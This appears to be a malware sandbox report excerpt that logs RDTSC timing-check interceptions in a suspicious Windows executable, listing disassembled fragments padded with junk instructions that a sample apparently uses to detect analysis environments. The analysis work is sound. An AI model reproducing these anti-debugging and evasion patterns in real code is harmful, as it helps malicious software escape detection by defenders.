    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96B91 second address: E96BB6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA198h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F0BACBDA19Eh 0x00000015 mov eax, dword ptr [eax] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96BB6 second address: E96BBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96BBB second address: E96BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA1A4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96CC2 second address: E96CC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E96CC7 second address: E96D3A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BACBDA198h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ecx, dword ptr [ebp+122D2C2Bh] 0x00000015 lea eax, dword ptr [ebp+1247379Bh] 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F0BACBDA198h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 0000001Bh 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov di, si 0x00000038 nop 0x00000039 jc 00007F0BACBDA1AFh 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jmp 00007F0BACBDA1A5h 0x00000047 popad 0x00000048 push eax 0x00000049 pushad 0x0000004a jmp 00007F0BACBDA19Dh 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA646 second address: ECA65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F0BACBDA3D8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F0BACBDA3D6h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA65D second address: ECA663 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA663 second address: ECA68A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a jmp 00007F0BACBDA3DDh 0x0000000f jo 00007F0BACBDA3D6h 0x00000015 pop edx 0x00000016 push esi 0x00000017 jc 00007F0BACBDA3D6h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA68A second address: ECA68F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA68F second address: ECA695 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA695 second address: ECA69F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECA94B second address: ECA954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ECE35F second address: ECE365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0ED2 second address: ED0ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0ED6 second address: ED0EDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED0EDA second address: ED0F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BACBDA3DCh 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F0BACBDA3D6h 0x00000013 jmp 00007F0BACBDA3E4h 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E544D3 second address: E544F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA1A4h 0x00000007 jmp 00007F0BACBDA19Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E544F8 second address: E54504 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F0BACBDA3D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E54504 second address: E54508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E54508 second address: E5450E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED66FA second address: ED6700 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: ED6700 second address: ED6706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exeRDTSC instruction interceptor: First address: E5CA82 second address: E5CA8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F0BACBDA196h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: E5CA8C second address: E5CAB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F0BACBDA3DCh 0x0000000c jmp 00007F0BACBDA3DDh 0x00000011 pop edi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5493 second address: ED54B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0BACBDA196h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F0BACBDA1A0h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED54B8 second address: ED54F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0BACBDA3E9h 0x0000000f jmp 00007F0BACBDA3DCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5627 second address: ED562B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED562B second address: ED5637 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0BACBDA3D6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5637 second address: ED5661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BACBDA1A3h 0x00000009 jmp 00007F0BACBDA1A3h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED517E second address: ED5194 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0BACBDA3D6h 0x00000008 jmp 00007F0BACBDA3DCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5F83 second address: ED5F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5F87 second address: ED5F9E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5F9E second address: ED5FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F0BACBDA196h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5FAE second address: ED5FB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED5FB2 second address: ED5FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED60F4 second address: ED610A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F0BACBDA3DDh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED6381 second address: ED638E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED638E second address: ED63BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DCh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0BACBDA3DFh 0x00000013 pushad 0x00000014 jmp 00007F0BACBDA3DAh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED63BF second address: ED63C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED63C5 second address: ED63CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: ED63CA second address: ED63D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F0BACBDA196h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: E52954 second address: E52969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 jc 00007F0BACBDA3D6h 0x0000000e jl 00007F0BACBDA3D6h 0x00000014 pop eax 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBCAB second address: EDBCAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBCAF second address: EDBCD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F0BACBDA3DDh 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBCD5 second address: EDBCE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0BACBDA196h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBCE1 second address: EDBCF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA3DBh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBCF5 second address: EDBCF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDBE34 second address: EDBE3E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDC0F8 second address: EDC0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDC0FC second address: EDC120 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnl 00007F0BACBDA3D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDC120 second address: EDC12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F0BACBDA196h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EDC448 second address: EDC457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jp 00007F0BACBDA3D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE0D0B second address: EE0D13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE0D13 second address: EE0D19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE0D19 second address: EE0D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE0D1D second address: EE0D3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E0h 0x00000007 jmp 00007F0BACBDA3DAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE0748 second address: EE074E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE074E second address: EE0752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE08D3 second address: EE08F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0BACBDA19Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c jmp 00007F0BACBDA19Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE08F3 second address: EE08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE951E second address: EE9543 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 js 00007F0BACBDA196h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F0BACBDA1ACh 0x00000016 js 00007F0BACBDA198h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE8879 second address: EE8896 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3E3h 0x00000007 ja 00007F0BACBDA3E2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE8896 second address: EE889C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE889C second address: EE88A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE88A7 second address: EE88AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE90E5 second address: EE90E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EE90E9 second address: EE90ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEE78E second address: EEE7A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BACBDA3DFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEEBB3 second address: EEEBB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEEBB9 second address: EEEBBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEEBBF second address: EEEBC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEED50 second address: EEED56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEED56 second address: EEED5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEF823 second address: EEF82D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EEF82D second address: EEF86C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F0BACBDA1A1h 0x0000000c jp 00007F0BACBDA196h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 jng 00007F0BACBDA196h 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007F0BACBDA19Bh 0x0000002a push edx 0x0000002b pop edx 0x0000002c popad 0x0000002d rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF2AE6 second address: EF2AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF2AEB second address: EF2AF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF2AF1 second address: EF2AF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF2238 second address: EF223C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF223C second address: EF2256 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0BACBDA3D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0BACBDA3DBh 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF27B7 second address: EF27BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF27BB second address: EF27C5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0BACBDA3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA0FF second address: EFA10B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F0BACBDA196h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA10B second address: EFA11D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0BACBDA3DCh 0x00000008 jns 00007F0BACBDA3D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA11D second address: EFA12C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA12C second address: EFA130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA130 second address: EFA134 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EFA134 second address: EFA13A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF889C second address: EF88A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF88A2 second address: EF88C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F0BACBDA3D6h 0x0000000a jng 00007F0BACBDA3D6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F0BACBDA3DEh 0x00000018 jp 00007F0BACBDA3D6h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF88C9 second address: EF88CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\Qyk8RJnGN7.exe RDTSC instruction interceptor: First address: EF88CD second address: EF88E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0BACBDA3DDh 0x0000000e rdtsc
